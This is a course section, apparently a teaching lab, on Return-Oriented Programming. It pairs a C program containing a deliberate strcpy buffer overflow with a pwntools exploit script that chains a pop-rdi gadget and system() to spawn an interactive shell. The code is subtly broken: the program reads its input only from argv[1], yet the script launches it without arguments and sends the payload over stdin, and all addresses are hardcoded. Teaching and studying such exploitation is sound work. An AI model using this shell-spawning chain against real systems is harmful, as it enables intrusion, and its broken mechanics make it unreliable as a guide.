6. Return-Oriented Programming (ROP)

Return-Oriented Programming (ROP)

Return-Oriented Programming (ROP) is a technique used in exploitation where existing code snippets, known as gadgets, are chained together to execute arbitrary commands or escalate privileges.

Lab Activity: Return-Oriented Programming (ROP) Attack

In this lab activity, we'll demonstrate a simple ROP attack on a vulnerable C program.

Defender Side Code:

#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: %s \n", argv[0]);
        return 1;
    }
    
    vulnerable_function(argv[1]);
    return 0;
}

To compile the defender side code:

gcc -o vulnerable_program vulnerable_program.c

Exploit Code (Python using pwntools):

from pwn import *

# Addresses of gadgets in the binary
pop_rdi_ret = 0x00400693  # gadget: pop rdi ; ret
system_addr = 0x7ffff7a52390  # address of system() function
bin_sh_addr = 0x7ffff7b97e9a  # address of "/bin/sh" string

# Padding to fill the buffer and overwrite the return address
padding = b"A" * 72

# ROP chain
rop_chain = p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)

# Payload
payload = padding + rop_chain

# Establishing connection to the vulnerable program
p = process("./vulnerable_program")

# Sending the payload
p.sendline(payload)

# Interactive shell
p.interactive()

The exploit code constructs a ROP chain with gadgets to set up the parameters for the system() function call, including the address of the "/bin/sh" string and the address of the system() function. It then establishes a connection to the vulnerable program, sends the payload, and gains an interactive shell upon successful exploitation.